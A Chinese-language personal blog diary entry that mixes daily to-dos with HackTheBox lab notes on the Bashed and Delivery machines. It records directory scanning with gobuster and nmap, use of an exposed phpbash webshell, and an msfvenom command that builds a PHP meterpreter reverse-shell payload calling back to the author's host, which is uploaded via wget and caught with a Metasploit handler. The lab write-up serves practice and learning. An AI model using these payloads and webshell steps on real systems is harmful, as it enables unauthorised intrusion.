1. 上班
2. 塑形课
3. 继续学习《设计模式之禅》
4. SDL_GameControllerDB_Util发新版本
5. HackTheBox Retired 【Bashed】打掉
5.1 gobuster
。。。因为昨天htb的网络条件太糟糕了所以数据太脏了,得洗一下
写个java脚本洗一下吧
1 | package com.xenoamess; |
gobuster的输出放在1.txt
洗出来后数据:
1 | /images (Status: 301) [Size: 317] [--> http://10.129.124.215/images/] |
一个个试一试呗。
images和upload昨天试了,没啥好玩的
嗯昨天页面上看他一直介绍一个叫phpbash.php的轮子,还明说了这台机子上就有
那就 挨个试试呗
怎么想都是/php和/dev嫌疑最大。
好,最终找到
http://10.129.124.215/dev/phpbash.php
拿到user
5.2 提权
思路是搞一个php reverse shell
1 | msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.16.4 LPORT=2468 -f raw -o xenoamess.php |
用dev.php + vim强行写进去
然后拿metasploit连上就完事了
emmmmm
最后选择了本地起一个http服务
然后让webshell那边wget
动静大点也无所谓吧毕竟是靶机
顺带一提 dev里没权限写入文件
得cd去uploads里才行
然后 打一波
http://10.129.125.123/uploads/xenoamess.php
1 | msf6 > use exploit/multi/handler |
…连不上。
能创建session但是不能开。
(或许是因为糟糕的网络条件吧)
切 那算了 溜了溜了
5. HackTheBox Challenge 【Emdee five for life】打掉 (使用方术)
写一个tampermonkey脚本即可。
注意,如果你的全局梯子的延迟的级别在100ms级(或更高),请关掉你的全局梯子
注意,其中md5部分抄自 https://github.com/blueimp/JavaScript-MD5
代码这里就不贴了,详见Emdee Five For Life
7. HackTheBox Alive 【Delivery】打掉 (进行中)
7.1 nmap
惯例nmap
1 | nmap -v -A -Pn 10.129.125.131 |
gobuster
1 | gobuster dir -u http://10.10.10.222/ -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt |
7.2 在?看看页面
【Contact Us】inspect一下 下边 的 Elements
1 | <!--<li><a href="#elements">Elements</a></li>--> |
咱给他改了!
1 | <li><a href="#elements">Elements</a></li> |
然后点一下咯
邮箱填入xenoamess@delivery.htb试试咯
不行啊。。
没头绪呢
明天吧明天
- 本文作者: XenoAmess
- 本文链接: http://xenoamess.com/2021/03/30/20210329修行/
-
版权声明:
本作品采用知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议进行许可。